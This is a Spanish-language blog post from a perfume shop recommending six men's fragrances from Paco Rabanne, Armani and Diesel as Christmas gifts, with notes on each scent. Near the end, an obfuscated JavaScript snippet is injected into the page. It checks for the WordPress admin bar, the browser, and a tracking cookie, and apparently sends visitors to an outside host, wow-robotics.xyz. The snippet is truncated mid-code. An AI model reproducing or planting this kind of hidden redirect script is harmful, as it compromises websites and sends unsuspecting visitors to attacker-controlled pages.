banner post perfumes

Ya están aquí las Fiestas Navideñas y con ellas, la ilusión, la alegría y no pueden faltar; las compras. Hoy desde Perfumerías Tin Tin queremos daros unas recomendaciones de perfumes para regalar a los hombres de nuestras vidas.

Paco Rabanne nos propone dos fragancias que destacan para estas Navidades:

Invictus: Una fragancia en la que Paco Rabanne nos sugiere a través de su frescura y sensualidad un representación del hombre actual. Invictus se convierte en un choque de mundos: por un lado la frescura que le aportan sus notas de salida entre las que se encuentra el pomelo frente a las notas de fondo de polisendro. Paco Rabanne encargó su creación a cuatro conocidos diseñadores: Veronique Nyberg, Anne Flipo, Olivier Polge y Dominique Ropion. Como imagen de este perfume la casa Rabanne ha elegido al deportista australiano Nick Youngquest. Os recomendamos que no os perdáis el video promocional en el que se describe el auténtico carácter de la fragancia.

1 Million: se presenta como una fragancia que nos evoca al retorno de una desenvuelta seducción masculina. Paco Rabanne define al hombre 1 Million como exuberante y audaz, amante de las nuevas sensaciones y nuevos descubrimientos. En cuanto a sus notas destacan menta y mandarina roja, siguiendo con notas de canela y esencia de rosa tomando como notas de fondo acordes de cuero y ámbar ketal.

Seguimos con Armani y dos clásicos infalibles:

Acqua di Gio: Si hay algo que caracteriza a esta fragancia es su frescura. Sus notas acuáticas y aromáticas poseen una salida protagonizada por la bergamota calabresa fresca, la flor de naranjo y la mandarina verde. Mezcla de matices ligeros y acuáticos con pétalos de jazmín, rosa de roca vigorizante, romero, caqui afrutado y pachulí indonesio cálido para crear un aroma masculino que nos aporte sensualidad. Un acierto seguro por lo natural, auténtico y su frescura marina amaderada.

Armani Code: Una fragancia de seducción sofisticada para un hombre fascinante que encarna la extrema elegancia y el carisma. Un perfume fresco, oriental y especiado: el código absoluto de seducción. Este perfume se desarrolla poco a poco al contacto con la piel, proporcionando a cada hombre una expresión distinta de seducción y magnetismo. Por lo que conseguiremos que este perfume sea especial y personal en la piel de aquel hombre que lo lleve.

Diesel no puede faltar en esta lista y tenemos dos recomendaciones:

Por un lado, un clásico y uno de los perfumes más vendidos Only The Brave: Diesel apuesta por un hombre joven pero con una fuerte personalidad. La fragancia nos transmite energía, éxito y seguridad para que el hombre que lo utilice pise fuerte en la vida, dejando de lado la debilidad. Only The Brave nos sorprende con una fragancia oriental amaderada en cuyas notas de salida predominan los cítricos como el limón y la mandarina junto al exotismo del cilantro. El perfume se desarrolla hacia un corazón de hojas de violeta, romero y ládano quedando de fondo notas amaderadas de cedro, ámbar y cuero.

Por otro lado, la novedad de 2014 de la marca Diesel Only The Brave Wild:

Una versión del perfume anterior que triplica sus fuerzas con un nuevo héroe nacido para ser salvaje. Diesel presenta este perfume como el equilibrio perfecto entre la naturaleza y lo urbano. Su envase basado en el tejido camuflaje, representa el símbolo de la fuerza y la rebelión, aunado con su forma de puño, representando la masculinidad de Diesel, consiguiendo la mezcla perfecta de inspiración e impulso que todo hombre necesita para conquistar su futuro.

Este perfume se caracteriza porque sustituyen las clásicas notas cítricas de salida por citronela, y las amaderadas de fondo por acordes exóticos como el coco.

¿Tienes que regalar algún perfume masculino? ¿Con cuál de nuestras opciones te quedarías?

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone